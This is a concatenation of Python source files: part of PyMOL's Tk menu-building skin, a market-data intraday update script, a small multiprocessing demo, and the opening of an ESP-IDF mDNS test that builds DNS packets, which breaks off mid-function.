variable = self.setting.cartoon_round_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Fancy Helices',
label='Fancy Helices',
variable = self.setting.cartoon_fancy_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Cylindrical Helices',
label='Cylindrical Helices',
variable = self.setting.cartoon_cylindrical_helices,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Flat Sheets',
label='Flat Sheets',
variable = self.setting.cartoon_flat_sheets,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Fancy Sheets',
label='Fancy Sheets',
variable = self.setting.cartoon_fancy_sheets,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Smooth Loops',
label='Smooth Loops',
variable = self.setting.cartoon_smooth_loops,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Discrete Colors',
label='Discrete Colors',
variable = self.setting.cartoon_discrete_colors,
)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Highlight Color',
label='Highlight Color',
variable = self.setting.cartoon_highlight_color,
onvalue=104, offvalue=-1,
)
addcascademenu('Cartoon', 'CartoonSampling', label='Sampling')
addmenuitem('CartoonSampling', 'radiobutton', label="Atom count dependent",
value=-1, variable=self.setting.cartoon_sampling)
for i in [2, 7, 14]:
addmenuitem('CartoonSampling', 'radiobutton', label=str(i),
value=i, variable=self.setting.cartoon_sampling)
addcascademenu('Cartoon', 'CartoonGapCutoff', label='Gap Cutoff')
for i in [0, 5, 10, 20]:
addmenuitem('CartoonGapCutoff', 'radiobutton', label=str(i),
value=i, variable=self.setting.cartoon_gap_cutoff)
self.menuBar.addcascademenu('Setting', 'Ribbon', 'Ribbon',
label='Ribbon')
self.menuBar.addmenuitem('Ribbon', 'checkbutton',
'Side Chain Helper',
label='Side Chain Helper',
variable = self.setting.ribbon_side_chain_helper,
)
self.menuBar.addmenuitem('Ribbon', 'checkbutton',
'Trace Atoms',
label='Trace Atoms',
variable = self.setting.ribbon_trace_atoms,
)
addmenuitem('Ribbon', 'separator')
addmenuitem('Ribbon', 'radiobutton', label='As Lines', value=0,
variable=self.setting.ribbon_as_cylinders)
addmenuitem('Ribbon', 'radiobutton', label='As Cylinders', value=1,
variable=self.setting.ribbon_as_cylinders)
addcascademenu('Ribbon', 'RibbonRadius', label='Cylinder Radius')
addmenuitem('RibbonRadius', 'radiobutton', label='Match Line Width',
value=0., variable=self.setting.ribbon_radius)
for val in [.2, .5, 1.]:
addmenuitem('RibbonRadius', 'radiobutton', label='%.1f Angstrom' % val,
value=val, variable=self.setting.ribbon_radius)
self.menuBar.addcascademenu('Setting', 'Surface', 'Surface',
label='Surface')
self.menuBar.addcascademenu('Surface', 'Surface Color', 'Color',
label='Color')
for label, val in [
('White', 0), # white
('Light Grey', 134), # grey80
('Grey', 24), # grey
('Default (Atomic)', -1),
]:
addmenuitem('Surface Color', 'radiobutton', label=label, value=val,
variable=self.setting.surface_color)
addmenuitem('Surface', 'separator', '')
for label, val in [
('Dot', 1),
('Wireframe', 2),
('Solid', 0),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_type)
self.menuBar.addmenuitem('Surface', 'separator', '')
for label, val in [
('Exterior (Normal)', 0),
('Cavities & Pockets Only', 1),
('Cavities & Pockets (Culled)', 2),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_cavity_mode)
self.menuBar.addcascademenu('Surface', 'Detection', 'Cavity Detection Radius',
label='Cavity Detection Radius')
for val in [7]:
addmenuitem('Detection', 'radiobutton', label='%d Angstrom' % val, value=float(val),
variable=self.setting.surface_cavity_radius)
for val in [3, 4, 5, 6, 8, 10, 20]:
addmenuitem('Detection', 'radiobutton', label='%d Solvent Radii' % val, value=val * -1.0,
variable=self.setting.surface_cavity_radius)
self.menuBar.addcascademenu('Surface', 'Cutoff', 'Cavity Detection Cutoff',
label='Cavity Detection Cutoff')
for val in [1, 2, 3, 4, 5]:
addmenuitem('Cutoff', 'radiobutton', label='%d Solvent Radii' % val, value=val * -1.0,
variable=self.setting.surface_cavity_cutoff)
self.menuBar.addmenuitem('Surface', 'separator', '')
self.menuBar.addmenuitem('Surface', 'checkbutton',
'Solvent Accessible',
label='Solvent Accessible',
variable = self.setting.surface_solvent,
)
addmenuitem('Surface', 'separator', '')
addmenuitem('Surface', 'checkbutton', label='Smooth Edges (Incentive-Only)',
state='disabled',
variable=self.setting.surface_smooth_edges)
addmenuitem('Surface', 'checkbutton', label='Edge Proximity',
variable=self.setting.surface_proximity)
self.menuBar.addmenuitem('Surface', 'separator', '')
for label, val in [
('Ignore None', 1),
('Ignore HETATMs', 0),
('Ignore Hydrogens', 2),
('Ignore Unsurfaced', 3),
]:
addmenuitem('Surface', 'radiobutton', label=label, value=val,
variable=self.setting.surface_mode)
self.menuBar.addcascademenu('Setting', 'Volume', label='Volume')
self.menuBar.addmenuitem('Volume', 'checkbutton', label='Pre-integrated Rendering (Incentive-Only)',
state='disabled',
variable = self.setting.volume_mode)
self.menuBar.addcascademenu('Volume', 'VolumeLayers', label='Number of Layers')
for i in (100., 256., 500., 1000.):
self.menuBar.addmenuitem('VolumeLayers', 'radiobutton', label='%.0f' % i,
value=i, variable=self.setting.volume_layers)
self.menuBar.addcascademenu('Setting', 'Transparency', 'Transparency',
label='Transparency')
self.transparency_menu('CartoonTransparency','Cartoon','cartoon_transparency')
self.transparency_menu('SurfaceTransparency','Surface','transparency')
self.transparency_menu('StickTransparency','Stick','stick_transparency')
self.transparency_menu('SphereTransparency','Sphere','sphere_transparency')
self.menuBar.addmenuitem('Transparency', 'separator', '')
for label, val, command in [
('Uni-Layer', 2, '_ set backface_cull, 1; set two_sided_lighting, 0'),
('Multi-Layer', 1, '_ set backface_cull, 0; set two_sided_lighting, 1'),
('Multi-Layer (Real-time OIT)', 3, ''),
('Fast and Ugly', 0, '_ set backface_cull, 1; set two_sided_lighting, 0'),
]:
addmenuitem('Transparency', 'radiobutton', label=label,
state='disabled' if val == 3 else 'normal', # not available in Open-Source PyMOL
value=val, variable=self.setting.transparency_mode,
command = lambda c=command: self.cmd.do(c))
addmenuitem('Transparency', 'separator', '')
addmenuitem('Transparency', 'checkbutton', label='Angle-dependent',
variable = self.setting.ray_transparency_oblique,
onvalue=1.0, offvalue=0.0)
self.menuBar.addcascademenu('Setting', 'Rendering', 'Rendering',
label='Rendering')
addmenuitem('Rendering', 'checkbutton', label='OpenGL 2.0 Shaders',
variable = self.setting.use_shaders)
addmenuitem('Rendering', 'separator', '')
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Smooth raytracing.',
label='Antialias (Ray Tracing)',
variable = self.setting.antialias,
)
self.menuBar.addmenuitem('Rendering', 'command', 'Modernize',
label='Modernize',
command = lambda s=self: s.util.modernize_rendering(1,s.cmd))
self.menuBar.addmenuitem('Rendering', 'separator', '')
self.menuBar.addcascademenu('Rendering', 'Shadows', 'Shadows',
label='Shadows')
self.menuBar.addmenuitem('Shadows', 'command', 'None',
label='None',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('none')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Light',
label='Light',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('light')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Medium',
label='Medium',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('medium')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Heavy',
label='Heavy',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('heavy')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Black',
label='Black',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('black')"))
self.menuBar.addmenuitem('Shadows', 'separator', '')
self.menuBar.addmenuitem('Shadows', 'command', 'Matte',
label='Matte',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('matte')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Soft',
label='Soft',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('soft')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Occlusion',
label='Occlusion',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('occlusion')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Occlusion 2',
label='Occlusion 2',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('occlusion2')"))
self.menuBar.addcascademenu('Rendering', 'Texture', 'Texture',
label='Texture')
for label, val in [
('None', 0),
('Matte 1', 1),
('Matte 2', 4),
('Swirl 1', 2),
('Swirl 2', 3),
('Fiber', 5),
]:
addmenuitem('Texture', 'radiobutton', label=label, value=val,
variable=self.setting.ray_texture)
self.menuBar.addcascademenu('Rendering', 'Interior Texture', 'Interior Texture',
label='Interior Texture')
for label, val in [
('Default', -1),
('None', 0),
('Matte 1', 1),
('Matte 2', 4),
('Swirl 1', 2),
('Swirl 2', 3),
('Fiber', 5),
]:
addmenuitem('Interior Texture', 'radiobutton', label=label, value=val,
variable=self.setting.ray_interior_texture)
self.menuBar.addcascademenu('Rendering', 'Memory', 'Memory',
label='Memory')
for label, val in [
('Use Less (slower)', 70),
('Use Standard Amount', 100),
('Use More (faster)', 170),
('Use Even More', 230),
('Use Most', 300),
]:
addmenuitem('Memory', 'radiobutton', label=label, value=val,
variable=self.setting.hash_max)
self.menuBar.addmenuitem('Rendering', 'separator', '')
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Cull Backfaces when Rendering',
label='Cull Backfaces',
variable = self.setting.backface_cull,
)
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Opaque Interior Colors',
label='Opaque Interiors',
variable = self.setting.ray_interior_color,
onvalue=74, offvalue=-1,
)
self.menuBar.addmenuitem('Setting', 'separator', '')
self.menuBar.addmenuitem('Setting', 'command', label='GUI Font Size (Dialog)',
command=self.inc_fontsize_dialog)
self.menuBar.addcascademenu('Setting', 'Control', 'Control Size',
label='Control Size')
for val in [12, 14, 16, 18, 20, 24, 30]:
addmenuitem('Control', 'radiobutton', label=str(val), value=val,
variable=self.setting.internal_gui_control_size)
self.menuBar.addmenuitem('Setting', 'separator', '')
addcascademenu('Setting', 'PDBLoading', label='PDB File Loading')
addmenuitem('PDBLoading', 'checkbutton',
'Ignore PDB segi.',
label='Ignore PDB Segment Identifier',
variable = self.setting.ignore_pdb_segi,
)
addcascademenu('Setting', 'CIFLoading', label='mmCIF File Loading')
addmenuitem('CIFLoading', 'checkbutton', label='Use "auth" Identifiers',
variable = self.setting.cif_use_auth)
addmenuitem('CIFLoading', 'checkbutton', label='Load Assembly (Biological Unit)',
variable = self.setting.assembly, onvalue="1", offvalue="")
addmenuitem('CIFLoading', 'checkbutton', label='Bonding by "Chemical Component Dictionary"',
variable = self.setting.connect_mode, onvalue=4)
addcascademenu('Setting', 'MapLoading', label='Map File Loading')
addmenuitem('MapLoading', 'checkbutton', label='Normalize CCP4 Maps',
variable = self.setting.normalize_ccp4_maps)
addmenuitem('MapLoading', 'checkbutton', label='Normalize O Maps',
variable = self.setting.normalize_o_maps)
addmenuitem('Setting', 'separator', '')
addcascademenu('Setting', 'AutoShow', label='Auto-Show ...', tearoff=TRUE)
addmenuitem('AutoShow', 'checkbutton',
label='Cartoon/Sticks/Spheres by Classification',
variable=self.setting.auto_show_classified)
addmenuitem('AutoShow', 'separator', '')
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Lines', variable=self.setting.auto_show_lines)
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Spheres', variable=self.setting.auto_show_spheres)
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Nonbonded', variable=self.setting.auto_show_nonbonded)
addmenuitem('AutoShow', 'separator', '')
addmenuitem('AutoShow', 'checkbutton',
'Auto-Show Selections.',
label='Auto-Show New Selections',
variable = self.setting.auto_show_selections,
)
addmenuitem('AutoShow', 'checkbutton',
'Auto-Hide Selections.',
label='Auto-Hide Selections',
variable = self.setting.auto_hide_selections,
)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Auto-Zoom.',
label='Auto-Zoom New Objects',
variable = self.setting.auto_zoom,
)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Auto-Remove Hydrogens.',
label='Auto-Remove Hydrogens',
variable = self.setting.auto_remove_hydrogens,
)
self.menuBar.addmenuitem('Setting', 'separator', '')
addmenuitem('Setting', 'checkbutton', label='Show Text / Hide Graphics [Esc]',
variable = self.setting.text)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Overlay Text Output on Graphics',
label='Overlay Text',
variable = self.setting.overlay,
)
self.menuBar.addmenu('Scene', 'Scene Storage',tearoff=TRUE)
self.menuBar.addmenuitem('Scene', 'command', 'Next',
label='Next [PgDn]',
command = lambda s=self: s.cmd.scene('auto','next'))
self.menuBar.addmenuitem('Scene', 'command', 'Previous',
label='Previous [PgUp]',
command = lambda s=self: s.cmd.scene('auto','previous'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'command', 'Append',
label='Append',
command = lambda s=self: s.cmd.scene('new','store'))
self.menuBar.addcascademenu('Scene', 'SceneAppend', label='Append...')
addmenuitem('SceneAppend', 'command', label='Camera',
command = lambda: self.cmd.scene('new', 'store', view=1, color=0, rep=0))
addmenuitem('SceneAppend', 'command', label='Color',
command = lambda: self.cmd.scene('new', 'store', view=0, color=1, rep=0))
addmenuitem('SceneAppend', 'command', label='Color & Camera',
command = lambda: self.cmd.scene('new', 'store', view=1, color=1, rep=0))
addmenuitem('SceneAppend', 'command', label='Reps',
command = lambda: self.cmd.scene('new', 'store', view=0, color=0, rep=1))
addmenuitem('SceneAppend', 'command', label='Reps & Color',
command = lambda: self.cmd.scene('new', 'store', view=0, color=1, rep=1))
self.menuBar.addmenuitem('Scene', 'command', 'Insert Before',
label='Insert (before)',
command = lambda s=self: s.cmd.scene('','insert_before'))
self.menuBar.addmenuitem('Scene', 'command', 'Insert After',
label='Insert (after)',
command = lambda s=self: s.cmd.scene('','insert_after'))
self.menuBar.addmenuitem('Scene', 'command', 'Update',
label='Update',
command = lambda s=self: s.cmd.scene('auto','update'))
# self.menuBar.addmenuitem('Scene', 'command', 'Annotate',
# label='Append',
# command = lambda s=self: s.cmd.scene('new','store'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'command', 'Delete',
label='Delete',
command = lambda s=self: s.cmd.scene('auto','clear'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addcascademenu('Scene', 'Recall', 'Recall',
label='Recall')
self.menuBar.addcascademenu('Scene', 'Store', 'Store',
label='Store')
# self.menuBar.addcascademenu('Store', 'StoreSHFT', 'StoreSHFT',
# label='Shift')
self.menuBar.addcascademenu('Scene', 'Clear', 'Clear',
label='Clear')
# self.menuBar.addcascademenu('Scene', 'SceneSHFT', 'SceneSHFT',
# label='Shift')
for x in range(1,13):
self.menuBar.addmenuitem('Store', 'checkbutton', 'F%d'%x,
label='F%d'%x,
variable = self.scene_F_keys[x - 1],
command = lambda x=x,s=self: s.cmd.do("scene F%d,store"%x))
# self.menuBar.addmenuitem('ClearSHFT', 'checkbutton', 'SHFT-F%d'%x,
# label='SHFT-F%d'%x,
# variable = self.setting.SHFTF[x],
# command = lambda x=x,s=self: s.cmd.do("scene SHFT-F%d,clear"%x))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'checkbutton', 'Buttons',
label='Buttons',
variable = self.setting.scene_buttons,
)
self.menuBar.addcascademenu('Scene', 'Cache', 'Cache',
label='Cache')
self.menuBar.addmenuitem('Cache', 'command', 'Enable',
label='Enable',
command = lambda s=self:
s.cmd.do("_ cache enable"))
self.menuBar.addmenuitem('Cache', 'command', 'Optimize',
label='Optimize',
command = lambda s=self:
s.cmd.do("_ cache optimize"))
self.menuBar.addmenuitem('Cache', 'command', 'Read Only',
label='Read Only',
command = lambda s=self:
s.cmd.do("_ cache read_only"))
self.menuBar.addmenuitem('Cache', 'command', 'Disable',
label='Disable',
command = lambda s=self:
s.cmd.do("_ cache disable"))
self.menuBar.addmenu('Mouse', 'Mouse Configuration',tearoff=TRUE)
self.menuBar.addcascademenu('Mouse', 'SelectionMode', 'Selection Mode',
label='Selection Mode')
var = self.setting.mouse_selection_mode
for lab, val in [
('Atoms', 0),
('Residues', 1),
('Chains', 2),
('Segments', 3),
('Objects', 4),
('', -1),
('Molecules', 5),
('', -1),
('C-alphas', 6),
]:
if not lab:
addmenuitem('SelectionMode', 'separator', '')
else:
addmenuitem('SelectionMode', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Motions',
label='3 Button Motions',
command = lambda s=self: s.cmd.config_mouse('three_button_motions'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Editing',
label='3 Button Editing',
command = lambda s=self: s.cmd.config_mouse('three_button_editing'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Viewing',
label='3 Button Viewing',
command = lambda s=self: s.cmd.mouse('three_button_viewing'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Lights',
label='3 Button Lights',
command = lambda s=self: s.cmd.mouse('three_button_lights'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button All Modes',
label='3 Button All Modes',
command = lambda s=self: s.cmd.config_mouse('three_button_all_modes'))
self.menuBar.addmenuitem('Mouse', 'command', '2 Button Editing',
label='2 Button Editing',
command = lambda s=self: s.cmd.config_mouse('two_button_editing'))
self.menuBar.addmenuitem('Mouse', 'command', '2 Button Viewing',
label='2 Button Viewing',
command = lambda s=self: s.cmd.config_mouse('two_button'))
self.menuBar.addmenuitem('Mouse', 'command', '1 Button Viewing Mode',
label='1 Button Viewing Mode',
command = lambda s=self: s.cmd.mouse('one_button_viewing'))
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'Emulate', 'Emulate',
label='Emulate')
self.menuBar.addmenuitem('Emulate', 'command', 'Maestro',
label='Maestro',
command = lambda s=self: s.cmd.mouse('three_button_maestro'))
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Virtual Trackball.',
label='Virtual Trackball',
variable = self.setting.virtual_trackball,
)
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Show Mouse Grid.',
label='Show Mouse Grid',
variable = self.setting.mouse_grid,
)
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Roving Origin.',
label='Roving Origin',
variable = self.setting.roving_origin,
)
# self.menuBar.addmenuitem('Mouse', 'checkbutton',
# 'Roving Detail.',
# label='Roving Detail',
# variable = self.setting.roving_detail,
# )
if sys.platform == 'darwin':
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'MacX11Focus', 'Mac OS X11',
label='Mac OS X11')
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Enable Click Through',
label='Enable Click Through',
command = lambda s=self:
s.toggleClickThrough(1))
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Disable Click Through',
label='Disable Click Through',
command = lambda s=self:
s.toggleClickThrough(0))
self.menuBar.addmenu('Wizard', 'Task Wizards',tearoff=TRUE)
self.menuBar.addmenuitem('Wizard', 'command', 'Appearance',
label='Appearance',
command = lambda s=self: s.cmd.do("_ wizard appearance"))
self.menuBar.addmenuitem('Wizard', 'command', 'Measurement',
label='Measurement',
command = lambda s=self: s.cmd.do("_ wizard measurement"))
self.menuBar.addmenuitem('Wizard', 'command', 'Mutagenesis',
label='Mutagenesis',
command = lambda s=self: s.cmd.do("_ wizard mutagenesis"))
self.menuBar.addmenuitem('Wizard', 'command', 'Pair Fitting',
label='Pair Fitting',
command = lambda s=self: s.cmd.do("_ wizard pair_fit"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Density Map Wizard',
label='Density',
command = lambda s=self: s.cmd.do("_ wizard density"))
self.menuBar.addmenuitem('Wizard', 'command', 'Filter',
label='Filter',
command = lambda s=self: s.cmd.do("_ wizard filter"))
self.menuBar.addmenuitem('Wizard', 'command', 'Sculpting',
label='Sculpting',
command = lambda s=self: s.cmd.do("_ wizard sculpting"))
if cleanup.auto_configure()>0:
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Cleanup',
label='Cleanup',
command = lambda s=self: s.cmd.do("_ wizard cleanup"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Label',
label='Label',
command = lambda s=self: s.cmd.do("_ wizard label"))
self.menuBar.addmenuitem('Wizard', 'command', 'Charge',
label='Charge',
command = lambda s=self: s.cmd.do("_ wizard charge"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addcascademenu('Wizard', 'Demo', 'Demo',
label='Demo',tearoff=TRUE)
self.menuBar.addmenuitem('Demo', 'command', 'Representations',
label='Representations',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,reps"))
self.menuBar.addmenuitem('Demo', 'command', 'Cartoon Ribbons',
label='Cartoon Ribbons',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,cartoon"))
self.menuBar.addmenuitem('Demo', 'command', 'Roving Detail',
label='Roving Detail',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,roving"))
self.menuBar.addmenuitem('Demo', 'command', 'Roving Density',
label='Roving Density',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,roving_density"))
self.menuBar.addmenuitem('Demo', 'command', 'Transparency',
label='Transparency',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,trans"))
self.menuBar.addmenuitem('Demo', 'command', 'Ray Tracing',
label='Ray Tracing',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,ray"))
self.menuBar.addmenuitem('Demo', 'command', 'Sculpting',
label='Sculpting',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,sculpt"))
self.menuBar.addmenuitem('Demo', 'command', 'Scripted Animation',
label='Scripted Animation',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,anime"))
self.menuBar.addmenuitem('Demo', 'command', 'Electrostatics',
label='Electrostatics',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,elec"))
self.menuBar.addmenuitem('Demo', 'command', 'Compiled Graphics Objects',
label='Compiled Graphics Objects',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,cgo"))
self.menuBar.addmenuitem('Demo', 'command', 'MolScript/Raster3D Input',
                                 label='MolScript/Raster3D Input',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,raster3d"))
self.menuBar.addmenuitem('Demo', 'separator', '')
self.menuBar.addmenuitem('Demo', 'command', 'End Demonstration',
label='End Demonstration',
command = lambda s=self: s.cmd.do(
'_ replace_wizard demo,finish'))
self.menuBar.addmenu('Plugin', 'Plugin',tearoff=TRUE)
# hook up scene menu updates
index = self.pymol.setting.index_dict.get('scenes_changed')
self.setting.active_dict[index] = self.update_scene_menu
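        # Editor's note: 'scenes_changed' is an internal PyMOL setting that changes whenever
        # the scene list does; wiring update_scene_menu into the skin's active_dict callback
        # table here is what keeps the Recall/Clear menus and the F-key checkbuttons current.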
def update_scene_menu(self):
scene_list = self.cmd.get_scene_list()
for action in ['recall', 'clear']:
parent = action.capitalize()
self.menuBar.deletemenuitems(parent, 0, 999)
for k in scene_list:
self.menuBar.addmenuitem(parent, 'command', k, label=k,
command=lambda k=k, a=action: self.cmd.scene(k, a))
for i in range(12):
k = 'F' + str(i + 1)
self.scene_F_keys[i].set(1 if k in scene_list else 0)
def show_about(self):
Pmw.aboutversion(self.appversion)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(
'For more information, browse to: %s\n or send email to: %s' %\
(self.contactweb, self.contactemail))
self.about = Pmw.AboutDialog(self.root, applicationname=self.appname)
self.my_activate(self.about)
self.about.withdraw()
def createInterface(self):
self.balloon = Pmw.Balloon(self.root)
self.createMenuBar()
self.app.menuBar = self.menuBar # to support legacy plugins
self.app.initializePlugins()
self.createDataArea()
self.createCommandArea()
self.createButtons()
self.createMessageBar()
self.createConsole()
def setup(self):
# call the parent method
PMGSkin.setup(self)
# name the application
self.root.title(self.appname)
# create the user interface
self.createInterface()
# pack the root window
self.app._hull.pack(side=LEFT, fill=BOTH, expand=YES, anchor=CENTER)
# and set focus
if hasattr(self,'entry'): self.entry.focus_set()
def takedown(self):
self.destroyMessageBar()
self.destroyDataArea()
self.destroyCommandArea()
self.destroyButtonArea()
self.balloon.destroy()
self.menuBar.destroy()
def __init__(self,app):
global root
root = app.root
PMGSkin.__init__(self,app)
Normal.appversion = app.pymol.cmd.get_version()[0]
Normal.appversion += " Incentive Product" \
if app.pymol.invocation.options.incentive_product else \
" Open-Source"
self.app = app
self.save_file = ''
self.cmd = app.pymol.cmd
self.util = app.pymol.util
self.movie_command = None
self.movie_start = 1
self.auto_overlay = None
self.edit_mode = None
self.valence = None
self._initialdir = ''
self.fixedfont = tkFont.nametofont('TkFixedFont')
self.scene_F_keys = [IntVar(root) for _ in range(12)]
def __init__(app):
return Normal(app)
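
# Editor's note (illustrative, not part of PyMOL): the menu callbacks above lean on
# default-argument binding (e.g. "lambda x=x, s=self: ...") to freeze the *current*
# loop value inside each callback instead of sharing the loop variable.  A minimal,
# self-contained sketch of the difference is below; the name is hypothetical and the
# skin never calls it.
def _early_binding_demo():
    late = [lambda: i for i in range(3)]       # every lambda sees the final i == 2
    early = [lambda i=i: i for i in range(3)]  # default argument captures i per iteration
    assert [f() for f in late] == [2, 2, 2]
    assert [f() for f in early] == [0, 1, 2]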
|
update_intraday.py
|
import os
import sys
from multiprocessing import Process, Value
sys.path.append('hyperdrive')
from DataSource import IEXCloud, Polygon # noqa autopep8
from Constants import POLY_CRYPTO_SYMBOLS, FEW_DAYS # noqa autopep8
import Constants as C # noqa autopep8
counter = Value('i', 0)
iex = IEXCloud()
poly = Polygon(os.environ['POLYGON'])
stock_symbols = iex.get_symbols()
crypto_symbols = POLY_CRYPTO_SYMBOLS
all_symbols = stock_symbols + crypto_symbols
# Double redundancy
# 1st pass
def update_iex_intraday():
for symbol in stock_symbols:
filenames = []
try:
filenames = iex.save_intraday(
symbol=symbol, timeframe='1d',
retries=1 if C.TEST else C.DEFAULT_RETRIES)
with counter.get_lock():
counter.value += 1
except Exception as e:
print(f'IEX Cloud intraday update failed for {symbol}.')
print(e)
finally:
if C.CI:
for filename in filenames:
if os.path.exists(filename):
os.remove(filename)
# 2nd pass
def update_poly_intraday():
for symbol in all_symbols:
filenames = []
try:
filenames = poly.save_intraday(
symbol=symbol, timeframe=FEW_DAYS, retries=1)
with counter.get_lock():
counter.value += 1
except Exception as e:
print(f'Polygon.io intraday update failed for {symbol}.')
print(e)
finally:
if C.CI:
for filename in filenames:
if os.path.exists(filename):
os.remove(filename)
p1 = Process(target=update_iex_intraday)
p2 = Process(target=update_poly_intraday)
p1.start()
p2.start()
p1.join()
p2.join()
if counter.value / (len(stock_symbols) + len(all_symbols)) < 0.95:
    sys.exit(1)
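
# Editor's note (hedged sketch, not part of the update job): the 95% check above reads
# `counter`, a multiprocessing.Value('i') that both worker processes increment under its
# lock -- without get_lock() the concurrent "+= 1" read-modify-write can drop updates.
# The demo below reuses the Process/Value imports already at the top of this file; the
# function names are hypothetical and nothing here calls them.
def _bump(shared, times):
    for _ in range(times):
        with shared.get_lock():  # serialize the read-modify-write on the shared int
            shared.value += 1


def _shared_counter_demo(n_procs=4, n_increments=1000):
    total = Value('i', 0)
    procs = [Process(target=_bump, args=(total, n_increments)) for _ in range(n_procs)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    return total.value  # expected: n_procs * n_increments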
|
process_test.py
|
from multiprocessing import Process
import os
import random
import time
import sys
def child(n):
indent = " " * n
    print('{}child{} ({})'.format(indent, n, os.getpid()))
for x in range(1, 6):
time.sleep(random.randint(1, 3))
sys.stdout.write('{}child{} ({}) {}\n'.format(indent, n, os.getpid(), x))
sys.stdout.flush()
    print('{}child{} *done*'.format(indent, n))
os._exit(0)
def parent():
print "parent pid", os.getpid()
procs = []
for n in range(1, 6):
print "starting child{}".format(n)
p = Process(target=child, args=(n, ))
p.start()
procs.append(p)
# if raw_input() == 'q': break
for p in procs:
p.join()
if __name__ == "__main__":
parent()
|
mdns_example_test.py
|
import re
import os
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
import subprocess
from tiny_test_fw import DUT
import ttfw_idf
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
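    # The 17 raw bytes below are a minimal DNS query on the wire: a 12-byte header
    # (ID=0, RD flag set, QDCOUNT=1) followed by one question for the root name with
    # QTYPE=A and QCLASS=IN; the real hostname is patched into dns.qd[0] just after.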
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
    dns.an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
